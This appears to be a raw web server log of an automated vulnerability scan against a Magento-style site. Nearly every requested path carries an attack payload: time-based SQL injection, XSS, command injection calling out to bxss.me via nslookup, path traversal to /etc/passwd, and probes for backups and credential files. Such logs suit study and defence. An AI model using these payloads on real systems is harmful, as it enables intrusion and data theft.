/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/index.php/install/wizard/config/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitci'.'bticemkte8647.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(74).chr(100).chr(89).'/js/mage/adminhtml/giftoptions/ 1 -
//skin/frontend/ 1 https://104.36.149.61/
/104-backup.sql.tar 1 -
/acc/%3b(nslookup%20hitqlleswatcrca7ff.bxss.me||perl%20-e%20\"gethostbyname('hitqlleswatcrca7ff.bxss.me')\")|(nslookup%20hitqlleswatcrca7ff.bxss.me||perl%20-e%20\"gethostbyname('hitqlleswatcrca7ff.bxss.me')\")&(nslookup%20hitqlleswatcrca7ff.bxss.me||perl%2 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/browser.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/response.write(9695601*9411553)/js/mage/adminhtml/image.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>JVyg(9044)<%2fScRiPt>/mage/adminhtml/backup.js 1 https://104.36.149.61/
/aRETopRv'%20OR%20845=(SELECT%20845%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitzf\".\"gfutndzmdb15f.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(98).chr(81).chr(122).chr(88).\"/js/mage/adminhtml/grid.js 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/validation.js 1 -
/acc/js/.%2fprototype/windows/themes/ 1 https://104.36.149.61/
/WHQ7VGKG'))%20OR%20266=(SELECT%20266%20FROM%20PG_SLEEP(15))--/skin/install/default/default/ 1 https://104.36.149.61/
/%3b(nslookup%20hitvibsoubrje3141d.bxss.me||perl%20-e%20\"gethostbyname('hitvibsoubrje3141d.bxss.me')\")|(nslookup%20hitvibsoubrje3141d.bxss.me||perl%20-e%20\"gethostbyname('hitvibsoubrje3141d.bxss.me')\")&(nslookup%20hitvibsoubrje3141d.bxss.me||perl%20-e% 1 -
/acc/js/mage/%3b(nslookup%20hitieyouncrqc5a6a3.bxss.me||perl%20-e%20\"gethostbyname('hitieyouncrqc5a6a3.bxss.me')\")|(nslookup%20hitieyouncrqc5a6a3.bxss.me||perl%20-e%20\"gethostbyname('hitieyouncrqc5a6a3.bxss.me')\")&(nslookup%20hitieyouncrqc5a6a3.bxss.me 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/boxes.css 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(109).concat(89).concat(97).concat(69)+(require\"socket\"%0aSocket.gethostbyname(\"hitba\"+\"notqhztn797d2.bxss.me.\")[3].to_s)+\"/js/prototype/extended_debug.js 1 -
/104_db.tar.gz 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/sales/ 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/skin/frontend/ 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/backup.js 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/sales/ 1 -
/(nslookup%20hityinfwjnjcbf13b8.bxss.me||perl%20-e%20\"gethostbyname('hityinfwjnjcbf13b8.bxss.me')\")/js/prototype/debug.js 1 -
/`(nslookup%20hitarnpdwjofp94fcc.bxss.me||perl%20-e%20\"gethostbyname('hitarnpdwjofp94fcc.bxss.me')\")`/skin/install/default/default/css/clears.css 1 -
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/ 1 https://104.36.149.61/
/backup-104.tar.gz 1 -
/acc/js/.%2fmage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/f8liKeI9/js/prototype/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>Lssw(9340)<%2fScRiPt>/skin/install/default/default/ 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/image.js 1 https://104.36.149.61/
/-1%20OR%203+411-411-1=0+0+0+1/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/css/iestyles.css 1 https://104.36.149.61/
/1Sm8ghY8O/index.php/install/ 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>xIbD(9398)<%2fScRiPt>/default/css/reset.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/prototype/prototype.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/image.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/104_db.zip 1 -
/.irb_history 1 -
/acc/index.php/install/wizard/..%2fpackage.json 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/windows/ 1 -
/adminer-4.6.2.php 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/windows/ 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"fb9h\"=\"fb9h/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/form.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/default/ 1 https://104.36.149.61/
/.%2facc/js/prototype/extended_debug.js 1 https://104.36.149.61/
/cgi-bin/php-cgi 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/windows/ 1 https://104.36.149.61/
/8oLDn8eS/skin/install/default/default/ 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../boot.ini 1 -
/echo%20hwddwh$()\\%20gbvzer\\nz^xyu||a%20%23'%20&echo%20hwddwh$()\\%20gbvzer\\nz^xyu||a%20%23|\"%20&echo%20hwddwh$()\\%20gbvzer\\nz^xyu||a%20%23/js/mage/adminhtml/accordion.js 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/sales/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/prototype.js 1 -
/`(nslookup%20hitixwvmwnqvuba21c.bxss.me||perl%20-e%20\"gethostbyname('hitixwvmwnqvuba21c.bxss.me')\")`/js/mage/adminhtml/events.js 1 -
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/bxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/css/clears.css 1 -
/'+response.write(9732476*9061845)+'/js/mage/adminhtml/form.js 1 -
/WEB-INF.zip 1 -
/acc/js/.%2fscriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/validation.js 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/grid.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>QEM2(9191)<%2fScRiPt>/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/prototype/windows<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/Http://bxss.me/t/fit.txt/js/prototype/ 1 https://104.36.149.61/
/cgi-bin/php.cgi 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>WvSu(9696)<%2fScRiPt>/events.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitww'.'mflrnwya0ae24.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(68).chr(120).chr(77).'/js/prototype/tooltip_manager.js 1 -
/acc/index.php/install/wizard//........................................................................../../../../../../../../etc/passwd 1 -
/acc/index.php//../../../../../../../../etc/passwd%00.jsp 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>ZcmW(9615)<%2fScRiPt>/mage/adminhtml/grid.js 1 https://104.36.149.61/
/cgi-bin/project.xml 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/vendor/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(121).concat(65).concat(101).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitxg\"+\"hxmibnyo4c067.bxss.me.\")[3].to_s)+\"/js/scriptaculous/effects.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/css/ie7minus.css 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>yxiC(9698)<%2fScRiPt>/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/.%2fjs/prototype/debug.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/varien/form.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/form.js 1 https://104.36.149.61/
/cgi-bin/.project 1 -
/1%00%c0%a7%c0%a2%252527%252522/index.php/install/wizard/config/ 1 https://104.36.149.61/
/api/3/nginx 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/&(nslookup%20hitaqzjxxjeac310ef.bxss.me||perl%20-e%20\"gethostbyname('hitaqzjxxjeac310ef.bxss.me')\")&'\\\"`0&(nslookup%20hitaqzjxxjeac310ef.bxss.me||perl%20-e%20\"gethostbyname('hitaqzjxxjeac310ef.bxss.me')\")&`'/skin/install/default/default/css/iestyles 1 -
/echo%20pfifcr$()\\%20oxngno\\nz^xyu||a%20%23'%20&echo%20pfifcr$()\\%20oxngno\\nz^xyu||a%20%23|\"%20&echo%20pfifcr$()\\%20oxngno\\nz^xyu||a%20%23/js/prototype/tooltip.js 1 -
/104-dump.zip 1 -
/acc/js/mage/adminhtml/..%2faccordion.js 1 https://104.36.149.61/
/mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 1 -
//js/prototype/tooltip.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/uploader/ 1 -
/admin/phpThumb/phpThumb.php 1 -
/acc/js/mage/centinel.js/928070%40 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/prototype.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/events.js 1 https://104.36.149.61/
/104-dump.7z 1 -
/'\"()&%25<acx><ScRiPt%20>Ijhk(9833)<%2fScRiPt>/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/install'\"()&%25<acx><ScRiPt%20>pdCA(9084)<%2fScRiPt>/ 1 https://104.36.149.61/
/admin/release 2 -
/Http://bxss.me/t/fit.txt/skin/adminhtml/ 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/js.js 1 -
/&(nslookup%20hitdofqbiemwzf9eab.bxss.me||perl%20-e%20\"gethostbyname('hitdofqbiemwzf9eab.bxss.me')\")&'\\\"`0&(nslookup%20hitdofqbiemwzf9eab.bxss.me||perl%20-e%20\"gethostbyname('hitdofqbiemwzf9eab.bxss.me')\")&`'/js/mage/translate.js 1 -
/&(nslookup%20hityqnsrpqjwi6b43d.bxss.me||perl%20-e%20\"gethostbyname('hityqnsrpqjwi6b43d.bxss.me')\")&'\\\"`0&(nslookup%20hityqnsrpqjwi6b43d.bxss.me||perl%20-e%20\"gethostbyname('hityqnsrpqjwi6b43d.bxss.me')\")&`'/js/mage/adminhtml/giftoptions/ 1 -
/mt/mt-upgrade.cgi 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/events.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/varien/js.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>gJZT(9277)<%2fScRiPt>/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/install/default/..%2fdefault/css/iestyles.css 1 https://104.36.149.61/
/.mysql_history 1 -
/PVlE6Vwn/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/lib/tiny_mce 1 -
/acc/index.php/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/wizard/locale/ 1 -
/1f38n4MiO/index.php/install/wizard/locale/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>c1E3(9803)<%2fScRiPt>/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/${9999392+9999156}/js/prototype/debug.js 1 -
/${@print(md5(31337))}\\/skin/install/default/default/css/iestyles.css 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/WEB-INF%20(copy)/jboss-web.xml 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/form.js 1 https://104.36.149.61/
/'\"/js/scriptaculous/effects.js 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/frontend/ 1 -
/@@erwrW/skin/adminhtml/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/varien/js.js 1 -
/acc/skin/%2fxfs.bxss.me/default/default/css/boxes.css 1 -
/cgi-bin/Gulpfile.js 1 -
/acc/./WEB-INF/web.xml%00.jsp 2 -
/jboss-net/services/listServices 1 -
/\".gethostbyname(lc(\"hitaz\".\"qsjobthg0c850.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(107).chr(65).chr(101).chr(83).\"/js/mage/adminhtml/sales/ 1 -
/^(%23$!@%23$)(()))******/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>fIWy(9830)<%2fScRiPt>/prototype/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2fpackage.json 1 -
/$(nslookup%20hithwdtzzpuzr4657f.bxss.me||perl%20-e%20\"gethostbyname('hithwdtzzpuzr4657f.bxss.me')\")/js/varien/form.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitgwfjxbzfwi69133.bxss.me||perl%20-e%20\"gethostbyname('hitgwfjxbzfwi69133.bxss.me')\")|(nslookup%20hitgwfjxbzfwi69133.bxss.me||perl%20-e%20\"gethostbyname('hitgwfjxbzfwi69133.bxss.me')\")&(nslookup%20hitgwfjxbzfwi69133.bxss.me 1 -
/acc/js/mage/adminhtml/giftoptions<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/|(nslookup%20hitzaepgwuoiu6a424.bxss.me||perl%20-e%20\"gethostbyname('hitzaepgwuoiu6a424.bxss.me')\")/js/mage/adminhtml/wysiwyg/ 1 -
//../../../../../../../../etc/passwd%00.jpg 1 -
/acc/skin/install/default/%2fxfs.bxss.me/css/iestyles.css 1 -
/asf/terminal 2 -
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/ 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/scripts/../../../../../../../../../../../../../etc/shells 1 -
/backup.zip 1 -
/adminer-4.6.2-mysql-en.php 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/grid.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'quyM'!='quyM%25/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/skin/%2fxfs.bxss.me/default/default/css/clears.css 1 -
/acc/js/mage/adminhtml/1some_inexistent_file_with_long_name%00.jpg.js 1 https://104.36.149.61/
/'\"/skin/install/default/default/css/reset.css 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/browser.js 1 https://104.36.149.61/
/acc9659517/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/`(nslookup%20hitelvuesuflo02500.bxss.me||perl%20-e%20\"gethostbyname('hitelvuesuflo02500.bxss.me')\")`/js/mage/adminhtml/uploader/ 1 -
/-1%20OR%203+978-978-1=0+0+0+1/js/prototype/windows/ 1 https://104.36.149.61/
/.%2facc/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/skin/%2fxfs.bxss.me/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/config/ 1 https://104.36.149.61/
/acc/index.php/..%2finstall/wizard/locale/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2fpackage-lock.json 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/varien/form.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/backup.tar.gz 1 -
/acc/js/prototype/1%00%c0%a7%c0%a2%252527%252522.js 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2fcss/reset.css 1 https://104.36.149.61/
/acc/js/prototype/window_ext.js/972930%40 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hithsnnromthkc867f.bxss.me||perl%20-e%20\"gethostbyname('hithsnnromthkc867f.bxss.me')\")|(nslookup%20hithsnnromthkc867f.bxss.me||perl%20-e%20\"gethostbyname('hithsnnromthkc867f.bxss.me')\")&(nslookup%20hithsnnromthkc867f.bxss.me||per 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/104_backup.rar 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/flexuploader.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>dgnk(9105)<%2fScRiPt>/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/index.php/install/ 1 https://104.36.149.61/
//........................................................................../../../../../../../../windows/win.ini 1 -
/cgi-bin/Gruntfile.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/`(nslookup%20hitihiqvhpfoe14d0c.bxss.me||perl%20-e%20\"gethostbyname('hitihiqvhpfoe14d0c.bxss.me')\")`/skin/adminhtml/default/ 1 -
/..%2fweb.config 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/debug.js 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/|(nslookup%20hittuuahrqmcmaa1f1.bxss.me||perl%20-e%20\"gethostbyname('hittuuahrqmcmaa1f1.bxss.me')\")/js/scriptaculous/effects.js 1 -
/acc/js/%3b(nslookup%20hittghbzrjoho212af.bxss.me||perl%20-e%20\"gethostbyname('hittghbzrjoho212af.bxss.me')\")|(nslookup%20hittghbzrjoho212af.bxss.me||perl%20-e%20\"gethostbyname('hittghbzrjoho212af.bxss.me')\")&(nslookup%20hittghbzrjoho212af.bxss.me||per 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>ll2Q(9616)<%2fScRiPt>/prototype.js 1 https://104.36.149.61/
/@@PWXPs/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/ 1 https://104.36.149.61/
/acc/skin'\"()&%25<acx><ScRiPt%20>c1E3(9550)<%2fScRiPt>/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.js 1 https://104.36.149.61/
/appsettings.Production.json 1 -
/acc9864741/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/Gp9xYOWi'))%20OR%20547=(SELECT%20547%20FROM%20PG_SLEEP(15))--/js/prototype/windows/themes/ 1 https://104.36.149.61/
/response.write(9043238*9519677)/skin/install/default/default/css/reset.css 1 -
/'+'A'.concat(70-3).concat(22*4).concat(98).concat(81).concat(120).concat(81)+(require'socket'%0aSocket.gethostbyname('hityq'+'xjzqhprk8963f.bxss.me.')[3].to_s)+'/js/mage/adminhtml/accordion.js 1 -
/%3b(nslookup%20hithwxjoswhog93dff.bxss.me||perl%20-e%20\"gethostbyname('hithwxjoswhog93dff.bxss.me')\")|(nslookup%20hithwxjoswhog93dff.bxss.me||perl%20-e%20\"gethostbyname('hithwxjoswhog93dff.bxss.me')\")&(nslookup%20hithwxjoswhog93dff.bxss.me||perl%20-e% 1 -
/|(nslookup%20hitqmjbygxibsfa732.bxss.me||perl%20-e%20\"gethostbyname('hitqmjbygxibsfa732.bxss.me')\")/skin/install/default/ 1 -
/w5DqgUqB'))%20OR%20719=(SELECT%20719%20FROM%20PG_SLEEP(15))--/js/scriptaculous/effects.js 1 https://104.36.149.61/
//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd 1 -
/acc/js/mage/..%2fadminhtml/sales/ 1 https://104.36.149.61/
/|echo%20zqekue$()\\%20yxmaxe\\nz^xyu||a%20%23'%20|echo%20zqekue$()\\%20yxmaxe\\nz^xyu||a%20%23|\"%20|echo%20zqekue$()\\%20yxmaxe\\nz^xyu||a%20%23/skin/frontend/ 1 -
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd%00.jpg 1 -
/${@print(md5(31337))}/js/mage/translate.js 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/skin/install/..%2fdefault/default/css/clears.css 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/events.js 1 https://104.36.149.61/
/cgi-bin/.s3cfg 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.js 1 https://104.36.149.61/
/acc/index.php/install//........................................................................../../../../../../../../etc/passwd 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/accordion.js 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
//..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini 1 -
/cgi-bin/q8u64b79n3bq.php 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/index.php/install//........................................................................../../../../../../../../windows/win.ini 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/browser.js 1 -
/acc/index.php/install/wizard'\"()&%25<acx><ScRiPt%20>KhMd(9314)<%2fScRiPt>/config/ 1 https://104.36.149.61/
/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2 1 -
/fn4UQTlp'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/frontend/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/Copy%20of%20WEB-INF/jboss-web.xml 1 -
/bf2OyO0T/js/prototype/tooltip.js 1 https://104.36.149.61/
/&echo%20qcpygr$()\\%20mnotks\\nz^xyu||a%20%23'%20&echo%20qcpygr$()\\%20mnotks\\nz^xyu||a%20%23|\"%20&echo%20qcpygr$()\\%20mnotks\\nz^xyu||a%20%23/skin/adminhtml/ 1 -
/acc/index.php/install/wizard/config//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/acc/js/prototype/prototype.js/912272%40 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c5c0%25ae% 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/product/ 1 -
/'\"/index.php/install/wizard/locale/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/uploader/ 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/default/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/events.js 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/ 1 -
//js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/@@vVmmV/js/prototype/extended_debug.js 1 https://104.36.149.61/
/bxss.me/skin/adminhtml/ 1 https://104.36.149.61/
/assets/fckeditor 2 -
/api/v1 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/install/.%2fdefault/ 1 https://104.36.149.61/
/response.write(9347243*9984767)/js/prototype/extended_debug.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/uploader/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/index.php/install/wizard/config/ 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
